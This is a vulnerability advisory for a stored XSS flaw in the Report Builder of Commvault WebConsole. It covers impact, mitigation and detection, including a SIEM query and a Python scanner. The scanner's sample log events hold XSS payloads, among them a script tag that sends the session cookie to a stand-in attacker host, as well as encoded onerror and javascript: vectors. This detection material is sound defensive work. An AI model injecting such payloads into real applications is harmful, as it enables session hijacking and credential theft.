CVE-2025-12776

5.4 MEDIUM

📋 TL;DR

This CVE describes a stored (persistent) Cross-Site Scripting (XSS) vulnerability in the Report Builder component of Commvault WebConsole. An authenticated attacker with edit permissions can embed script in a report; the script is saved with the report and executes in the browser of any other user with edit permissions who later modifies that report in Report Builder. WebConsole is end-of-life, so no patched version exists and the only remediation is removal or isolation.

💻 Affected Systems

Products:
  • Commvault WebConsole
Versions: All versions (package is end-of-life)
Operating Systems: All supported by WebConsole
Default Config Vulnerable: ⚠️ Yes
Notes: Only affects systems with WebConsole installed and Report Builder component enabled. Requires user with edit permissions to exploit.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker with edit permissions could inject script that executes in the browser of other administrators when they modify the report, leading to session hijacking, credential theft, actions performed in the victim's WebConsole session with the victim's privileges, or further compromise of the backup environment.

🟠

Likely Case

Limited impact since exploitation requires edit permissions and only affects users modifying reports through the Report Builder interface.

🟢

If Mitigated

Minimal impact if deployed in isolated network without internet access and with strict access controls limiting edit permissions.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated user with edit permissions. No public exploit code identified.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: N/A

Vendor Advisory: https://documentation.commvault.com/securityadvisories/CV_2025_06_3.html

Restart Required: No

Instructions:

No official patch is available because WebConsole is end-of-life. Follow the vendor's recommendation in the advisory and do not run WebConsole in production; migrate any remaining users to the supported replacement interface.

🔧 Temporary Workarounds

Network Isolation

all

Deploy WebConsole in a fully isolated network segment with no internet access and no access to sensitive data.

Access Control Restriction

all

Minimize the number of users holding edit permissions for the Report Builder component, since every such user is both a potential attacker and a potential victim.

🧯 If You Can't Patch

  • Remove WebConsole from production environments entirely
  • Implement strict network segmentation and firewall rules to isolate WebConsole instances

🔍 How to Verify

Check if Vulnerable:

Check whether the WebConsole package is installed and the Report Builder component is enabled; if both are true, the instance is vulnerable regardless of version.

Check Version:

Every version is affected, so the version check reduces to a presence check: confirm via the installed-package inventory or the installation logs whether the WebConsole package is present.

Verify Fix Applied:

Verify that WebConsole has been removed, or, where it cannot be removed yet, that it is network-isolated and that edit permissions have been restricted as described above.

📡 Detection & Monitoring

Log Indicators:

  • Unusual report modifications
  • Multiple failed edit attempts
  • Suspicious script-like content in report data

Network Indicators:

  • Unexpected outbound connections from WebConsole server
  • Traffic to/from isolated WebConsole network

SIEM Query:

source="webconsole" AND (event="report_edit" OR event="report_save") AND (data CONTAINS "<script>" OR data CONTAINS "javascript:")

This literal match is a starting point only: it misses case variants such as `<ScRiPt>`, URL- or entity-encoded payloads, and tag-less vectors such as `onerror=` attributes. Where the SIEM supports it, decode the field and match case-insensitively against a broader indicator set.
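The query above is limited to two literal strings. The following Python is an added example, not code from the page or from Commvault: it applies the same filter (WebConsole edit/save events only) over JSON-formatted log lines, decodes URL and HTML-entity encoding before matching, and checks a broader, case-insensitive indicator set. The field names `source`, `event`, `user`, `report` and `data` follow the query above but are an assumption about the log format, and the sample events are constructed.

```python
import html
import json
import re
from urllib.parse import unquote

# Indicator patterns for script content persisted in report definitions. Each is
# matched case-insensitively against the *decoded* field, so "<ScRiPt",
# "%3Cscript" and "&lt;script" all hit, unlike a literal "<script>" match.
XSS_INDICATORS = [
    ("script_tag",     re.compile(r"<\s*script\b", re.I)),
    ("javascript_uri", re.compile(r"javascript\s*:", re.I)),
    ("event_handler",  re.compile(
        r"\bon(error|load|click|mouse\w*|focus|blur|input|change|submit|key\w*|animation\w*|toggle)\s*=",
        re.I)),
    ("active_embed",   re.compile(r"<\s*(iframe|object|embed|svg)\b", re.I)),
    ("css_expression", re.compile(r"expression\s*\(", re.I)),
]


def normalise(value, max_rounds=3):
    """Strip URL- and HTML-entity encoding, repeating a few rounds so that
    double-encoded payloads are unwrapped; stops early once nothing changes."""
    text = value
    for _ in range(max_rounds):
        decoded = html.unescape(unquote(text))
        if decoded == text:
            break
        text = decoded
    return text


def find_indicators(value):
    """Return the labels of every indicator that matches the decoded value."""
    decoded = normalise(value)
    return [label for label, pattern in XSS_INDICATORS if pattern.search(decoded)]


def scan_events(lines, edit_events=("report_edit", "report_save")):
    """Apply the SIEM query's filter to JSON log lines: only WebConsole edit/save
    events are inspected, and one finding is produced per event whose report
    data contains an indicator. Non-JSON lines are skipped, not fatal."""
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except ValueError:
            continue
        if event.get("source") != "webconsole" or event.get("event") not in edit_events:
            continue
        hits = find_indicators(str(event.get("data", "")))
        if hits:
            findings.append({"user": event.get("user"),
                             "report": event.get("report"),
                             "indicators": hits})
    return findings


# Constructed sample events; the field names are an assumption about the log format.
SAMPLE_EVENTS = [
    # benign markup in a report body: no indicator should fire
    {"source": "webconsole", "event": "report_save", "user": "alice",
     "report": "Q3 Backup Summary", "data": "<b>Backup status</b> for 2025-Q3"},
    # plain script tag exfiltrating the session cookie
    {"source": "webconsole", "event": "report_edit", "user": "bob",
     "report": "Q3 Backup Summary",
     "data": "<script>fetch('https://attacker.invalid/?c='+document.cookie)</script>"},
    # URL-encoded, tag-less vector: invisible to a literal "<script>" match
    {"source": "webconsole", "event": "report_save", "user": "mallory",
     "report": "SLA Overview", "data": "%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"},
    # entity-encoded, mixed-case javascript: URI
    {"source": "webconsole", "event": "report_save", "user": "mallory",
     "report": "SLA Overview",
     "data": "&lt;a href=&quot;JaVaScRiPt:alert(1)&quot;&gt;x&lt;/a&gt;"},
    # a view event is out of scope for the query, so it is ignored
    {"source": "webconsole", "event": "report_view", "user": "eve",
     "report": "SLA Overview", "data": "<script>alert(1)</script>"},
    # wrong source, also ignored
    {"source": "tomcat", "event": "report_save", "user": "eve",
     "data": "<script>alert(1)</script>"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS] + ["not a json line"]

if __name__ == "__main__":
    for finding in scan_events(SAMPLE_LOG):
        print(finding)
```

Running the block prints three findings (bob's script tag and mallory's two encoded payloads) and skips the view event, the non-WebConsole event and the malformed line. The decode loop is the point: the second and third sample payloads only match after decoding, which is exactly what the literal SIEM query misses.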

🔗 References
